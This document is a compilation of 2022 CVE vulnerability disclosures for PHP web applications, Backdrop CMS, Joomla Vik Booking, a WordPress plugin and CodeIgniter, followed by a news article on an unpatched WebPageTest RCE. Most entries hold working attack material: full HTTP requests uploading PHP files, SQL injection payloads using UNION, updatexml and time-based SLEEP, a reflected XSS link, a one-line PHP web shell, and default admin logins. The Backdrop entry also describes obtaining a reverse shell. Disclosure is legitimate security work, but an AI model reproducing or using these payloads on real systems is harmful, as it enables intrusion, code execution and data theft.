An arbitrary file upload vulnerability in the component /php_action/editFile.php of Online Diagnostic Lab Management System v1.0 allows attackers to execute arbitrary code via a crafted PHP file.

Permalink

**Online Diagnostic Lab Management System v1.0 by mayuri\_k has arbitrary code execution (RCE)**

BUG\_Author: Via

vendors: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability url: ip/diagnostic/php\_action/editFile.php?id=1

Loophole location: Online Diagnostic Lab Management System's editFile.php file exists arbitrary file upload (RCE)

Request package for file upload：

POST /diagnostic/php\_action/editFile.php?id\=1 HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.88/diagnostic/editorder.php?id=1
Cookie: PHPSESSID=flklolh755oivesj89eu5fo2c7
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------269801976022857
Content-Length: 431
\-----------------------------269801976022857
Content-Disposition: form-data; name="old\_image"
Z614.pdf
\-----------------------------269801976022857
Content-Disposition: form-data; name="productImage"; filename="se.php"
Content-Type: application/octet-stream
<?php phpinfo(); ?>
\-----------------------------269801976022857
Content-Disposition: form-data; name="btn"
\-----------------------------269801976022857--

The files will be uploaded to this directory \\diagnostic\\assets\\myimages\\

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-41512: bug_report/RCE-1.md at main · TGAyouman/bug_report

Open Source SACCO Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /sacco_shield/ajax.php?action=delete_payment.

Permalink

Cannot retrieve contributors at this time

**Open Source SACCO Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Via

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15372/open-source-sacco-management-system-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /sacco\_shield/ajax.php?action=delete\_payment

Vulnerability location: /sacco\_shield/ajax.php?action=delete\_payment, id

dbname = sacco,length=5

\[+\] Payload: id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /sacco\_shield/ajax.php?action\=delete\_payment HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-41515: bug_report/SQLi-2.md at main · TGAyouman/bug_report

Open Source SACCO Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /sacco_shield/ajax.php?action=delete_loan.

Permalink

Cannot retrieve contributors at this time

**Open Source SACCO Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Via

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15372/open-source-sacco-management-system-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /sacco\_shield/ajax.php?action=delete\_loan

Vulnerability location: /sacco\_shield/ajax.php?action=delete\_loan, id

dbname = sacco,length=5

\[+\] Payload: id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /sacco\_shield/ajax.php?action\=delete\_loan HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-41514: bug_report/SQLi-1.md at main · TGAyouman/bug_report

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /diagnostic/edittest.php.

**Online Diagnostic Lab Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Via

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /diagnostic/edittest.php?id=

Vulnerability location: /diagnostic/edittest.php?id=, id

dbname = diagnostic

\[+\] Payload: /diagnostic/edittest.php?id=-1%27%20union%20select%201,database(),3,4,5,6,7,8,9--+ // Leak place ---> id

GET /diagnostic/edittest.php?id\=\-1%27%20union%20select%201,database(),3,4,5,6,7,8,9\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=flklolh755oivesj89eu5fo2c7
Connection: close

CVE-2022-41513: bug_report/SQLi-1.md at main · TGAyouman/bug_report

Backdrop CMS 1.22.0 has Unrestricted File Upload vulnerability via 'themes' that allows attackers to Remote Code Execution.

**Description**

\# An Issue is discovered in Backdrop CMS 1.22.0.

#We found a vulnerability file upload when we upload the malicious file as a theme in the theme installer on the Apperance page.

**Proof of Concept**

First, we login to the target application with admin privileges.

Then select Appearance and select Install new themes.

click Manual Installation.

we can upload with zip files.

so we find themes files at github.

https://github.com/backdrop-contrib/

after that we use simple web shell and zip it to theme files.

<?php system($\_GET\[“cmd”\]); ?>

back too Manual installation and upload zip files.

Installed lateral successfully.

we use gobuster to find which path of themes.

after we know path we can access to the backdoor and execute “whoami” command.

use nc to get our reverse shell.

we use reverse shell payload from this website.

https://revshells.com

Finally execute “powershell” command to create reverse shell connection.

**Author**

Grim The Ripper Team by SOSECURE Thailand

CVE-2022-42092: Backdrop CMS 1.22.0 — Unrestricted File Upload (Themes)

Joomla Vik Booking extension version 1.15.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : e4j Extensions for Joomla - extensionsforjoomla.com                        ││  Software : Joomla Vik Booking 1.15.0                                                  ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.php/en/bookingGET parameter 'categories' is vulnerable to XSShttps://extensionsforjoomla.com/livedemo/vikbooking/index.php/en/booking?option=com_vikbooking&task=showprc&roomsnum=1&roomopt%5B%5D=9&adults%5B%5D=2&children%5B%5D=1&days=1&checkin=1665057600&checkout=1665136800&category_id=&categories=rnrtm%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ew3vus&Itemid=103[-] Done

Joomla Vik Booking 1.15.0 Cross Site Scripting

WordPress Zephyr Project Manager plugin version 3.2.42 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi# Date: 14-08-2022# Exploit Author: Rizacan Tufan# Blog Post: https://rizax.blog/blog/wordpress-plugin-zephyr-project-manager-multiple-sqli-authenticated# Software Link: https://wordpress.org/plugins/zephyr-project-manager/# Vendor Homepage: https://zephyr-one.com/# Version: 3.2.42# Tested on: Windows, Linux# CVE : CVE-2022-2840 (https://wpscan.com/vulnerability/13d8be88-c3b7-4d6e-9792-c98b801ba53c)# DescriptionZephyr Project Manager is a plug-in that helps you manage and get things done effectively, all your projects and tasks.It has been determined that the data coming from the input field in most places throughout the application are used in=20the query without any sanitize and validation.The details of the discovery are given below.# Proof of Concept (PoC)=20The details of the various SQL Injection on the application are given below.## Endpoint of Get Project Data.Sample Request :=20POST /wp-admin/admin-ajax.php HTTP/2Host: vuln.localCookie: ......Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_projectsContent-Type: application/x-www-form-urlencoded; charset=3DUTF-8X-Requested-With: XMLHttpRequestContent-Length: 74Origin: https://vuln.localSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersaction=3Dzpm_view_project&project_id=3D1&zpm_nonce=3D22858bf3a7Payload :=20---Parameter: project_id (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: action=3Dzpm_view_project&project_id=3D1 AND 4923=3D4923&zpm_nonce=3D22858bf3a7    Type: time-based blind    Title: MySQL >=3D 5.0.12 OR time-based blind (query SLEEP)    Payload: action=3Dzpm_view_project&project_id=3D1 OR (SELECT 7464 FROM (SELECT(SLEEP(20)))EtZW)&zpm_nonce=3D22858bf3a7    Type: UNION query    Title: Generic UNION query (NULL) - 20 columns    Payload: action=3Dzpm_view_project&project_id=3D-4909 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71707a7071,0x6264514e6e4944795a6f6e4a786a6e4d4f666255434d6a5553526e43616e52576c75774743434f67,0x71786b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&zpm_nonce=3D22858bf3a7---## Endpoint of Get Task Data.Sample Request :=20POST /wp-admin/admin-ajax.php HTTP/2Host: vuln.localCookie: ......Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasksContent-Type: application/x-www-form-urlencoded; charset=3DUTF-8X-Requested-With: XMLHttpRequestContent-Length: 51Origin: https://vuln.localSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailerstask_id=3D1&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7Payload :=20---Parameter: task_id (POST)    Type: time-based blind    Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)    Payload: task_id=3D1 AND (SELECT 5365 FROM (SELECT(SLEEP(20)))AdIX)&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7---## Endpoint of New Task.Sample Request :=20POST /wp-admin/admin-ajax.php HTTP/2Host: vuln.localCookie: ......Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasksContent-Type: application/x-www-form-urlencoded; charset=3DUTF-8X-Requested-With: XMLHttpRequestContent-Length: 337Origin: https://vuln.localSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailerstask_name=3Dtest&task_description=3Dtest&task_project=3D1&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Dtest&type=3Ddefault&recurrence%5Btype%5D=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7Payload :=20---Parameter: task_project (POST)    Type: time-based blind    Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)    Payload: task_name=3Dtest&task_description=3Dtest&task_project=3D1 AND (SELECT 3078 FROM (SELECT(SLEEP(20)))VQSp)&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Drrrr-declare-q-varchar-99-set-q-727aho78zk9gcoyi8asqud6osfy9m0io9hx9kz8o-oasti-fy-com-tny-exec-master-dbo-xp-dirtree-q&type=3Ddefault&recurrence[type]=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7---

WordPress Zephyr Project Manager 3.2.42 SQL Injection

B.C. Institute of Technology CodeIgniter <=3.1.13 is vulnerable to SQL Injection via system\database\DB_query_builder.php.

**Multiple functions of CodeIgniter have SQL injection****Vulnerability Type :**

SQL Injection

**Vulnerability Version :**

3.0rc <= CodeIgniter <= 3.1.13

**Recurring environment:**

*   Windows 10
*   PHP 7.3.4
*   Apache 2.4.39

**Vulnerability Details**

CodeIgniter is an Application Development Framework - a toolkit - for people who build web sites using PHP.

SQL injection exists for multiple functions in CodeIgniter, and the versions involved are 3.0rc to 3.1.13

The functions involved are where()、or\_where()、having()、or\_having()、where\_in()、or\_where\_in()、where\_not\_in()、or\_where\_not\_in()、like()、or\_like()、not\_like() and or\_not\_like().

The functions listed above do not filter the query fields. If the developer obtains the query fields from the client, the attacker can modify the query fields and trigger SQL injection.

**Describe**

    File:
        system\database\DB_query_builder.php
    
    Core Functions:
        protected function _wh($qb_key, $key, $value = NULL, $type = 'AND ', $escape = NULL)    //662
        protected function _where_in($key = NULL, $values = NULL, $not = FALSE, $type = 'AND ', $escape = NULL)   //804
        protected function _like($field, $match = '', $type = 'AND ', $side = 'both', $not = '', $escape = NULL)    //947
    
    _wh() Explain
        //The following section provides the complete function code.
        ${$qb_key} = array('condition' => $prefix.$k, 'value' => $v, 'escape' => $escape);
        _wh() does not filter $k before splicing $prefix and $k. If we can control $k, SQL injection will be triggered.
        _where_in() and _like() have the same situation.
    
    Public Funtions
        Although  _wh()、where_in() and _like() are protected, but CodeIgniter provides some public functions.
        _wh()
            where()
            or_where()
            having()
            or_having()
        _where_in()        
            where_in()
            or_where_in()
            where_not_in()
            or_where_not_in()
        _like()        
            like()
            or_like()
            not_like()
            or_not_like()
    

protected function \_wh($qb\_key, $key, $value = NULL, $type = 'AND ', $escape = NULL)
{
   $qb\_cache\_key = ($qb\_key === 'qb\_having') ? 'qb\_cache\_having' : 'qb\_cache\_where';
   if ( ! is\_array($key))
   {
   	$key = array($key => $value);
   }
   // If the escape value was not set will base it on the global setting
   is\_bool($escape) OR $escape = $this\->\_protect\_identifiers;
   foreach ($key as $k => $v)
   {
   	$prefix = (count($this\->$qb\_key) === 0 && count($this\->$qb\_cache\_key) === 0)
   		? $this\->\_group\_get\_type('')
   		: $this\->\_group\_get\_type($type);
   	if ($v !== NULL)
   	{
   		if ($escape === TRUE)
   		{
   			$v = $this\->escape($v);
   		}
   		if ( ! $this\->\_has\_operator($k))
   		{
   			$k .= ' = ';
   		}
   	}
   	elseif ( ! $this\->\_has\_operator($k))
   	{
   		// value appears not to have been set, assign the test to IS NULL
   		$k .= ' IS NULL';
   	}
   	elseif (preg\_match('/\\s\*(!?=|<>|\\sIS(?:\\s+NOT)?\\s)\\s\*$/i', $k, $match, PREG\_OFFSET\_CAPTURE))
   	{
   		$k = substr($k, 0, $match\[0\]\[1\]).($match\[1\]\[0\] === '=' ? ' IS NULL' : ' IS NOT NULL');
   	}
   	${$qb\_key} = array('condition' => $prefix.$k, 'value' => $v, 'escape' => $escape);
   	$this\->{$qb\_key}\[\] = ${$qb\_key};
   	if ($this\->qb\_caching === TRUE)
   	{
   		$this\->{$qb\_cache\_key}\[\] = ${$qb\_key};
   		$this\->qb\_cache\_exists\[\] = substr($qb\_key, 3);
   	}
   }
   return $this;
}

**Verification(3.1.13)**

    Code Download
        https://github.com/bcit-ci/CodeIgniter/releases/tag/3.1.13
    Apache needs to add the following in .htaccess
        <IfModule mod_rewrite.c>
        Options +FollowSymlinks -Multiviews
        RewriteEngine On
        RewriteCond %{REQUEST_FILENAME} !-d
        RewriteCond %{REQUEST_FILENAME} !-f
        RewriteRule ^(.*)$ index.php?/$1 [QSA,PT,L]
        </IfModule>
    Environment Construction
        The detailed process is omitted, and the final result is as follows.
    

    File Modification
        1. Edit database configuration file application\config\database.php.
        As a test, I used the information schema of mysql system database 'information-schema'.
    

        2. Download the Sql.php file and move it to the application\controllers\ folder.
        Sql.php uses data table 'engines'.
    

    Try SQL Injection
        1. Normal access 
        Query with the field 'ENGINE'.
        Because the query conditions are different, the results are displayed differently.
        http://192.168.37.129:8080/sql/index?val=*&field=ENGINE
    

        2.Malicious access
        SQL injection through fields.
        The 12 functions above all display the database name.
        SQL injection will occur when careless developers use fields sent by the front end.
        http://192.168.37.129:8080/sql/index?val=*&field=ENGINE like '*' union select database(),2,3,4,5,6 -- -
    

  

**Verification(3.0rc)**

  

**Verification(3.1.1)**

CVE-2022-40835: CodeIgniter3.1.13-SQL-Inject/README.md at main · 726232111/CodeIgniter3.1.13-SQL-Inject

An SQL injection vulnerability issue was discovered in Sourcecodester Simple E-Learning System 1.0., in /vcs/classRoom.php?classCode=, classCode.

Permalink

Cannot retrieve contributors at this time

**Simple E-Learning System by oretnom23 has SQL injection**

BUG\_Author：xtxxueyan

vendors: https://www.sourcecodester.com/php-simple-e-learning-system-source-code

Vulnerability File: /vcs/classRoom.php?classCode=

Vulnerability location: /vcs/classRoom.php?classCode=, classCode

dbname = vcs\_db

**time-based blind**

Payload: /vcs/classRoom.php?classCode=-9082' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,sleep(5),NULL-- - // Leak place ---> classCode

**boolean-based blind**

Payload: /vcs/classRoom.php?classCode=class101\_a' AND 6907=6907 AND 'TSIZ'='TSIZ // Leak place ---> classCode

Payload: /vcs/classRoom.php?classCode=class101\_a' AND 6907=6907 AND 'TSIZ'='TSIQ // Leak place ---> classCode

sqlmap can inject it，can query the database in use now

CVE-2022-40872: bug_report/SQLi-1.md at main · xtxxueyan/bug_report

Public disclosure, a talk, and a blog post later, the RCE exploit remains unresolved

Public disclosure, a talk, and a blog post later, the RCE exploit remains unresolved

Despite a researcher’s best efforts at disclosure, the maintainers of the WebPageTest project appear to be ignoring a severe remote code execution (RCE) vulnerability.

In a blog post dated September 23, ManoMano researcher Louka “Laluka” Jacques-Chevallier discussed his discovery of a pre-authentication RCE vulnerability in the open source project WebPageTest.

The research has also been the subject of a talk at DEFCON Paris.

Catch up with the latest security research and analysis

Developed by Catchpoint, WebPageTest is a tool dating back to the days of dial-up modems and the 1990s, which has evolved to become a utility to check the speed and performance of website code for optimization purposes.

According to the researcher, this software has been “prone” to security issues in the past, including a lack of updates to code and containers, outdated components which remained unpatched against known vulnerabilities, and the “intensive use of smelly PHP code”.

The latest stable release of WebPageTest, v22.01, was published in October 2021.

Server-side request forgery (SSRF) vulnerabilities, bugs that allow attackers to make successful requests via a server-side application to an unintended location or resource, have been found in WebPageTest in the past.

A newly discovered SSRF flaw was the focus of Laluka’s research.

After examining the software’s source code and carrying out both crawling and fuzzing tests, Laluka discovered an SSRF vulnerability in under 15 minutes. The SSRF was limited to an HTTP scheme, but the underlying code held more surprises for the cybersecurity researcher.

**Under the microscope**

Upon closer inspection Laluka uncovered a range of issues, including PHP code that could trigger a payload by including a slash in a path, file write bugs, and sanitization failures. Eventually, the researcher was able to push a command injection, create a reverse shell, exploit JSON file jobs, and achieve RCE.

It may also be possible to exploit the RCE if the Beanstalkd work queue engine is in use. While not present in default configurations, Laluka says that the SSRF and command injection issues could be exploited to inject a new, malicious job and force the worker to use the file.

The researcher found the first SSRF bug on April 15, and by May 25, verified the full RCE exploit chain. Laluka contacted the vendor on June 15, and although Catchpoint responded, the lines of communication were described as “pretty tedious”.

**‘Open bag’**

Despite providing the technical details of the issue and a video Proof-of-Concept (PoC), the vendor did not respond until July 28, when Catchpoint offered a $300 “big” bounty program reward.

Laluka offered to help with patch validation, but there has been radio silence since. Although he was paid, it’s been over 90 days, and there is still no news on a fix.

“I think that this software can be really helpful for devs and site reliability engineers, but that the codebase isn’t following good practices whatsoever,” Laluka told The Daily Swig. “It’s basically features in a bag – an open bag.”

Catchpoint has not responded to requests for comment from The Daily Swig.

RELATED PHP package manager component Packagist vulnerable to compromise

Tag

#php